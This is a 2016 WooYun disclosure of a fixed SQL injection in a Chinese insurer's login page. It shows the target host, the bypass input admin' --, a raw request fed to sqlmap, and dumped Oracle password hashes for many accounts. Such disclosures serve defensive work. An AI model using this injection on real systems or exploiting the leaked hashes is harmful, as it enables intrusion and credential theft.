当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0182953

漏洞标题:中银保险某系统一处SQL注入漏洞(DBA权限26库)

相关厂商:中银保险有限公司

漏洞作者: 暴走

提交时间:2016-03-10 17:17

修复时间:2016-03-16 11:29

公开时间:2016-03-16 11:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-10: 细节已通知厂商并且等待厂商处理中
2016-03-11: 厂商已经确认,细节仅向厂商公开
2016-03-16: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

点到为止吧,第三方软件不可靠啊。

详细说明:

今天在首页浏览漏洞,发现了公开了“ WooYun: 中银保险车险某系统后台弱口令导致Getshell(涉及车险信息) ”漏洞,于是就看了下,发现该漏洞描存在的情况已经不存在了,提交到公开就3天,处理速度还蛮快的..

漏洞证明:

于是就继续测试了下:http://219.143.241.24:8001/aqqx/

1.png


试了下弱密码之类的没试出来,就知道用户名是admin,该系统用户名输入正确,密码输入错误时,提示“密码错误”,算是个小问题吧,系统也没验证码,可尝试暴力破解。

2.png


由于我的网速不给力就放弃了,可是发现了登录用户名username存在注入。
用户名输入:admin' --
密码随意

3.png


点击登录后,系统没报错,而是跳转到如下页面:

4.png


于是对登录进行抓包,使用SQLMAP测试下username

POST /aqqx/LoginServlet HTTP/1.1
Host: 219.143.241.24:8001
Proxy-Connection: keep-alive
Content-Length: 32
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://219.143.241.24:8001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://219.143.241.24:8001/aqqx/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=71MCWgLN5YVcd2C8TKV1vctpbRf2FjwHQmkGjmGFLzzHBDD772Cg!-1792212123
username=admin&password=11111111


测试结果如下:

5.png


dba权限的

6.png


基于时间的盲注跑数据太慢了,就点到位为止吧:
26库:

7.png


current-db:

8.png


current-user --password:

web application technology: Servlet 2.4, JSP, JSP 2.0
back-end DBMS: Oracle
current user:    'AQQX_BD'
database management system users password hashes:
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] AQQX_BD [1]:
    password hash: 5A9828B458AEF00D
[*] AQQX_CS [1]:
    password hash: A79F29192DF10DA1
[*] CTXSYS [1]:
    password hash: 71E687F036AD56E5
[*] DBSNMP [1]:
    password hash: FFF45BB2C0C327EC
[*] DIP [1]:
    password hash: CE4A36B8E06CA59C
[*] DMSYS [1]:
    password hash: BFBA5A553FD9E28A
[*] EXFSYS [1]:
    password hash: 66F4EF5650C20355
[*] FOGLIGHT [1]:
    password hash: 16CE1767CEAE6835
[*] JYQUERY [1]:
    password hash: DD08F28B8108C411
[*] MDDATA [1]:
    password hash: DF02A496267DEE66
[*] MDSYS [1]:
    password hash: 72979A94BAD2AF80
[*] MGMT_VIEW [1]:
    password hash: ACC69AC5E5C7872C
[*] OLAPSYS [1]:
    password hash: 3FB8EF9DB538647C
[*] ORDPLUGINS [1]:
    password hash: 88A2B2C183431F00
[*] ORDSYS [1]:
    password hash: 7EFA02EC7EA6B86F
[*] OUTLN [1]:
    password hash: 4A3BA55E08595C81
[*] PJBJ_BD [1]:
    password hash: 70A26E4027F00ABC
[*] PJBJ_CS [1]:
    password hash: 74FFFD9EF5E8D3D1
[*] pjbj_j y_2 [1]:
    password hash: FC34EA976A65473E
[*] PJBJ_JY [1]:
    password hash: 083AA3AFB062C335
[*] PJBJ_JY2 [1]:
    password hash: 462CDA5C451BB9FE
[*] PJBJ_JY_1 [1]:
    password hash: 253C932F57789AF1
[*] PJBJ_KF [1]:
    password hash: 91D956975D9D528F
[*] PJBJ_QY [1]:
    password hash: 8FA2BDED924141F5
[*] PJBJ_YS [1]:
    password hash: 26F301A33A63075F
[*] SCOTT [1]:
    password hash: F894844C34402B67
[*] SI_INFORMTN_SCHEMA [1]:
    password hash: 84B8CBCA4D477FA3
[*] SYS [1]:
    password hash: 4B944C7BE803D6C8
[*] SYSMAN [1]:
    password hash: 1DEA5CF775BB128B
[*] SYSTEM [1]:
    password hash: 11560E4C486B25F8
[*] TSMSYS [1]:
    password hash: 3DF26A8B17D0F29F
[*] WMSYS [1]:
    password hash: 7C9BA362F8314299
[*] XDB [1]:
    password hash: 88D8364765FCE6AF
[*] ZHENGCHE [1]:
    password hash: FFA856E41B9397D0


当前数据库包含18表:

9.png


AQQX_CS数据库:

10.png


数据我就不给你们跑了。

修复方案:

能给个高分吗..

版权声明:转载请注明来源 暴走@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-03-11 08:27

厂商回复:

非常感谢,我们将尽快修复系统。

最新状态:

2016-03-16:已修复

漏洞评价:

评价

  1. 2016-03-10 19:54 | 中银保险有限公司(乌云厂商)

    非常感谢您,高手啊。给您一个小礼物,以表感谢。

  2. 2016-03-10 20:32 | 暴走 ( 普通白帽子 | Rank:546 漏洞数:98 | Wooyun的Rank获取如同Dota冲天梯有过之而无...)

    @中银保险有限公司 都是第三方的软件惹的祸啊,不过我很感兴趣是什么礼物...